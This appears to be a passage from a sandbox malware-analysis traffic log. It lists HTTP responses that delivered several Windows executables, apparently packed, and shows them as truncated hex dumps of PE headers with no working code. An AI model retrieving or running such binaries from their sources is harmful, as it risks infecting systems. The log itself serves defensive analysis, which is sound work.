09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 05:23:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:23:42 GMTContent-Type: application/octet-streamContent-Length: 3194368Last-Modified: Tue, 12 Nov 2024 05:07:35 GMTConnection: keep-aliveETag: "6732e297-30be00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 43 0b 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 b3 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b3 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 6f 73 78 74 70 6f 79 00 10 2a 00 00 b0 06 00 00 04 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 71 63 76 61 75 77 71 00 10 00 00 00 c0 30 00 00 04 00 00 00 98 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 9c 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:24:09 GMTContent-Type: application/octet-streamContent-Length: 1816064Last-Modified: Tue, 12 Nov 2024 05:07:27 GMTConnection: keep-aliveETag: "6732e28f-1bb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 80 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 69 00 00 04 00 00 46 fe 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 75 75 73 71 63 67 6e 00 20 1a 00 00 50 4f 00 00 1a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 63 69 6f 6d 6b 6c 67 00 10 00 00 00 70 69 00 00 04 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 69 00 00 22 00 00 00 94 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 05:24:22 GMTContent-Type: application/octet-streamContent-Length: 2871296Last-Modified: Tue, 12 Nov 2024 05:06:30 GMTConnection: keep-aliveETag: "6732e256-2bd000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2c 00 00 04 00 00 ed 2f 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 